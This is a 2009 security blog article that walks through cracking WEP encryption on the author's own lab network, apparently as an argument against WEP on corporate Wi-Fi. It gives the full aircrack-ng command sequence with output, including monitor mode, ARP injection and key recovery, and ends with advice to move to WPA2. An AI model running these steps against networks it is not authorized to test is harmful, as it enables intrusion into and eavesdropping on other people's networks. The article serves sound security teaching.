« Microsoft ActiveX flaw could be Conficker 2.0
Man pleads guilty to abetting spam king Ralsky »

Wireless WEP (in)security

Posted by peter on July 9, 2009 – 2:26 pm      
Source , Filed under Articles
Tagged as , , , , , , , , , , , , , , , ,


Overview


There is no question that wireless networks are notoriously unsecure – it is difficult to protect something that you can’t see, that goes through walls and that everyone close enough can eavesdrop. Some corporations are still brave enough (or stupid) to allow wireless access to their corporate network, and more often than not, they chose to utilize the deprecated wireless encryption protocol WEP to avoid compatibility issues. In this article we will demonstrate why allowing wireless access to the corporate network is not a good idea, especially if an old encryption algorithm like WEP is used.


Scenario


To illustrate the scenario we will use an old Linksys wireless PCMCIA network card and we will break into a specially created for the purpose wireless network called SoulReaver, which we have setup on a Linksys wireless router. The laptop on which the potential malicious activities will be performed is preinstalled with BackTrack 4 Pre and we will use an arp injection technique to speed up the demonstration.

Once the operating system has booted, insert the card in the PCMCIA slot and you should see the following line in dmesg:

b43-phy0: Broadcom 4306 WLAN found

This means that the card has been successfully detected. Next we need to put the card in monitoring mode, so we can have a look around. This is achieved with the following command:

# airmon-ng start wlan0

After that e new network interface called mon0 will appear and we will use it to sniff the air around us:

# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                             

 00:1A:70:FD:3A:76  -41        5       11    0   6  54e  WEP  WEP         SoulReaver                                                                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                  

 (not associated)   00:1D:E0:82:80:31  -74    0 - 1      3        4
 00:1A:70:FD:3A:76  00:21:5D:13:FE:56  -45   54e-54e    45       12

So there we see a wireless network called “SoulReaver” which is protected with WEP. At this point we just fire up a packet sniffer and wait for enough packets to be collected in order to crack the WEP key, but as we want to speed up the process we will use an ARP injection technique to collect more packets faster.

#  aireplay-ng -3 -e SoulReaver -a 00:1A:70:FD:3A:76 -x 200 mon0
No source MAC (-h) specified. Using the device MAC (00:12:17:07:E0:15)
16:06:22  Waiting for beacon frame (ESSID: SoulReaver) on channel 6
Found BSSID "00:1A:70:FD:3A:76" to given ESSID "SoulReaver".
Saving ARP requests in replay_arp-0709-160622.cap
You should also start airodump-ng to capture replies.
Read 7803 packets (got 1 ARP requests and 1173 ACKs), sent 1222 packets...(199 pps)

The command above does the following – selects the third attack which is ARP injection, specifies that we will attack a wireless network called “SoulReaver” with MAC address of the access point “00:1A:70:FD:3A:76″ and configures the packet injection rate with 200 packets per second. As we can see from the command output, aireplay-ng automatically discovers the source MAC address, locates the wireless network at channel 6 and waits for a valid ARP packet that can be used for injection. After such packet is captured, the tool starts sending packets at a rate of 199 packets per second, at which point we can start to dump the packets into a file:

# airodump-ng -c 6 -w soul mon0

The command above instructs airdump-ng to listen on channel 6 on interface mon0 and to write the captured packets in a file called soul.cap. After we have captured enough packets, we can try cracking the password with the following command:

# aircrack-ng -a 1 -n 64 soul*.cap

We specify that we want to perform WEP cracking and that we want to try with 64 bit key first. If you have captured enough packets, after a short delay the following screen will appear:

                                                                       Aircrack-ng 1.0 rc3 r1552

                                                       [00:00:04] Tested 730859 keys (got 13883 IVs)

   KB    depth   byte(vote)
    0   22/ 32   F3(16384) 40(16128) 53(16128) 7D(16128) 93(16128) 97(16128) A2(16128) A9(16128) AE(16128) CB(16128) 17(15872) 1B(15872)
    1    1/ 14   84(18944) AC(18432) FD(18432) 6E(17920) 5D(17664) B2(17664) 02(17664) 59(17408) 62(17408) 7E(17408) C3(17408) 07(17408)
    2    0/ 12   0D(19968) 5D(19968) 25(18944) 7F(18688) A7(18688) 14(18688) 53(18176) F3(17920) F6(17920) 0A(17152) 9C(16896) 4D(16896)
    3    4/ 10   86(18688) 62(18176) 97(18176) 38(17920) 4F(17664) 6D(17664) 1C(17408) 5E(17408) 70(17408) 92(17408) 02(17152) 3A(16896)
    4    1/ 14   52(19968) F9(19456) F0(18944) 9C(18688) B4(18176) FE(17920) 03(17664) 43(17664) 32(17408) 28(16896) 33(16896) 35(16896) 

                         KEY FOUND! [ CB:74:0D:89:52 ]
	Decrypted correctly: 100%


Mitigation


The recommended solution to WEP security problems is to switch to WPA2 or with older equipment the less resource intensive WPA. Either is much more secure than WEP. To add support for WPA or WPA2, some old Wi-Fi access points might need to be replaced or have their firmware upgraded. WPA was designed as an interim software-implementable solution for WEP that could forestall immediate deployment of new hardware. However, TKIP (the basis of WPA) has reached the end of its designed lifetime and has been deprecated in the next full release of the 802.11 standard.


Related Posts


Related Posts